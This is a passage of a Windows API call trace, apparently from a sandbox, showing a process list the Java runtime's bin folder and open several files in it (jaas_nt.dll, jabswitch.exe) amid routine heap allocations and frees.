[0091.027] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0091.027] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0091.027] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0091.027] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88770 [0091.027] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0091.027] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0091.027] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0091.027] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88770 | out: hHeap=0x20000) returned 1 [0091.027] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0091.027] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0091.027] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0091.027] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0091.027] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0091.027] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0091.027] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0091.028] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0091.028] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0091.028] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0091.028] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88770 [0091.028] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0091.028] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88770 | out: hHeap=0x20000) returned 1 [0091.028] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0091.028] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0091.028] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0091.028] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0091.028] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0091.028] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0091.028] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0091.028] AreFileApisANSI () returned 1 [0091.028] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x536d0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 52 [0091.028] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x68) returned 0x45e88 [0091.028] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x536d0, cbMultiByte=-1, lpWideCharStr=0x45e88, cchWideChar=52 | out: lpWideCharStr="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\j2pkcs11.dll") returned 52 [0091.028] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\j2pkcs11.dll" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\j2pkcs11.dll"), fInfoLevelId=0x0, lpFileInformation=0x313f6c0 | out: lpFileInformation=0x313f6c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa7453105, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xa7453105, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0xa7453105, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0xf840)) returned 1 [0091.028] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x45e88 | out: hHeap=0x20000) returned 1 [0091.028] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfc0 | out: hHeap=0x20000) returned 1 [0091.028] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf90 | out: hHeap=0x20000) returned 1 [0091.028] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x536d0 | out: hHeap=0x20000) returned 1 [0091.028] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0091.028] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0091.028] FindNextFileW (in: hFindFile=0x78610, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa7453105, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xa7453105, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0xa7453105, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0x5240, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="jaas_nt.dll", cAlternateFileName="")) returned 1 [0091.028] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0091.028] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0091.028] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0091.028] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88770 [0091.028] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0091.028] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0091.028] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0091.028] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88770 | out: hHeap=0x20000) returned 1 [0091.028] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf10 [0091.028] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x35030 [0091.029] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf10 | out: hHeap=0x20000) returned 1 [0091.029] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x35030 | out: hHeap=0x20000) returned 1 [0091.029] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf10 [0091.029] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x35130 [0091.029] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf10 | out: hHeap=0x20000) returned 1 [0091.029] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x35130 | out: hHeap=0x20000) returned 1 [0091.029] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0091.029] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6cdf0 [0091.029] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0091.029] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x76) returned 0x6a3b0 [0091.029] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6cdf0 | out: hHeap=0x20000) returned 1 [0091.029] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0091.029] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x76278 [0091.029] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6a3b0 | out: hHeap=0x20000) returned 1 [0091.029] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0091.029] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0091.029] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0091.029] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0091.029] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x76278 | out: hHeap=0x20000) returned 1 [0091.029] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0091.029] AreFileApisANSI () returned 1 [0091.029] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\jaas_nt.dll", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\jaas_nt.dll", lpUsedDefaultChar=0x0) returned 51 [0091.029] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x536d0 [0091.029] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0091.029] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0091.029] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf90 [0091.029] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf10 [0091.030] AreFileApisANSI () returned 1 [0091.030] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x536d0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 51 [0091.030] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x66) returned 0x460b8 [0091.030] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x536d0, cbMultiByte=-1, lpWideCharStr=0x460b8, cchWideChar=51 | out: lpWideCharStr="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\jaas_nt.dll") returned 51 [0091.030] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\jaas_nt.dll" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\jaas_nt.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x418 [0091.030] GetFileType (hFile=0x418) returned 0x1 [0091.030] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x460b8 | out: hHeap=0x20000) returned 1 [0091.030] SetFilePointerEx (in: hFile=0x418, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0091.030] SetFilePointerEx (in: hFile=0x418, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0091.030] SetFilePointerEx (in: hFile=0x418, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0091.031] CloseHandle (hObject=0x418) returned 1 [0091.031] AreFileApisANSI () returned 1 [0091.031] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x536d0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 51 [0091.031] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x66) returned 0x466d8 [0091.031] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x536d0, cbMultiByte=-1, lpWideCharStr=0x466d8, cchWideChar=51 | out: lpWideCharStr="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\jaas_nt.dll") returned 51 [0091.115] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\jaas_nt.dll" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\jaas_nt.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x360 [0091.116] GetFileType (hFile=0x360) returned 0x1 [0091.116] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x466d8 | out: hHeap=0x20000) returned 1 [0091.116] CloseHandle (hObject=0x360) returned 1 [0091.116] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0091.116] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0091.116] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0091.116] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887e8 [0091.116] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0091.116] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0091.116] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0091.116] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887e8 | out: hHeap=0x20000) returned 1 [0091.116] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0091.116] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0091.116] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0091.116] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0091.116] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0091.116] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0091.116] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0091.116] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0091.116] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0091.116] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0091.116] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0091.116] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887e8 [0091.116] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0091.117] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0091.117] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0091.117] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887e8 | out: hHeap=0x20000) returned 1 [0091.117] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0091.117] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0091.117] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0091.117] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0091.117] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0091.117] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0091.117] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0091.117] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0091.117] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0091.117] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0091.117] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0091.117] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0091.117] AreFileApisANSI () returned 1 [0091.117] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x536d0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 51 [0091.117] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x66) returned 0x46358 [0091.117] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x536d0, cbMultiByte=-1, lpWideCharStr=0x46358, cchWideChar=51 | out: lpWideCharStr="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\jaas_nt.dll") returned 51 [0091.117] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\jaas_nt.dll" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\jaas_nt.dll"), fInfoLevelId=0x0, lpFileInformation=0x313f6c0 | out: lpFileInformation=0x313f6c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa7453105, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xa7453105, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0xa7453105, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0x5240)) returned 1 [0091.117] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x46358 | out: hHeap=0x20000) returned 1 [0091.117] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf10 | out: hHeap=0x20000) returned 1 [0091.117] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf90 | out: hHeap=0x20000) returned 1 [0091.117] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x536d0 | out: hHeap=0x20000) returned 1 [0091.117] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0091.117] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0091.117] FindNextFileW (in: hFindFile=0x78610, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa7453105, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xa7453105, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0xa7453105, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0x8640, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="jabswitch.exe", cAlternateFileName="JABSWI~1.EXE")) returned 1 [0091.117] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0091.117] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0091.117] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0091.117] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0091.117] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0091.117] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0091.117] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0091.118] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0091.118] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf10 [0091.118] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x34f90 [0091.118] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf10 | out: hHeap=0x20000) returned 1 [0091.118] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x34f90 | out: hHeap=0x20000) returned 1 [0091.118] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf90 [0091.118] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x35030 [0091.118] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf90 | out: hHeap=0x20000) returned 1 [0091.118] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x35030 | out: hHeap=0x20000) returned 1 [0091.118] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0091.118] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d738 [0091.118] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0091.118] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x76) returned 0x6a5b0 [0091.118] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d738 | out: hHeap=0x20000) returned 1 [0091.118] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0091.118] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75eb8 [0091.118] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6a5b0 | out: hHeap=0x20000) returned 1 [0091.118] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0091.118] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0091.118] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0091.118] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0091.118] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75eb8 | out: hHeap=0x20000) returned 1 [0091.118] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0091.118] AreFileApisANSI () returned 1 [0091.118] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\jabswitch.exe", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\jabswitch.exe", lpUsedDefaultChar=0x0) returned 53 [0091.118] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53520 [0091.118] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0091.118] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0091.118] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d000 [0091.118] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf90 [0091.118] AreFileApisANSI () returned 1 [0091.118] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53520, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 53 [0091.118] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x6a) returned 0x76200 [0091.119] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53520, cbMultiByte=-1, lpWideCharStr=0x76200, cchWideChar=53 | out: lpWideCharStr="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\jabswitch.exe") returned 53 [0091.119] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\jabswitch.exe" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\jabswitch.exe"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x360 [0091.119] GetFileType (hFile=0x360) returned 0x1 [0091.119] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x76200 | out: hHeap=0x20000) returned 1 [0091.125] SetFilePointerEx (in: hFile=0x360, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0091.125] SetFilePointerEx (in: hFile=0x360, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0091.125] SetFilePointerEx (in: hFile=0x360, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0091.125] CloseHandle (hObject=0x360) returned 1 [0091.125] AreFileApisANSI () returned 1 [0091.125] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53520, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 53 [0091.125] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x6a) returned 0x75c60 [0091.125] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53520, cbMultiByte=-1, lpWideCharStr=0x75c60, cchWideChar=53 | out: lpWideCharStr="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\jabswitch.exe") returned 53 [0091.126] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\jabswitch.exe" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\jabswitch.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x360 [0091.126] GetFileType (hFile=0x360) returned 0x1 [0091.126] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75c60 | out: hHeap=0x20000) returned 1 [0091.126] CloseHandle (hObject=0x360) returned 1 [0091.126] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0091.126] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0091.126] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0091.126] RtlAllocateHeap 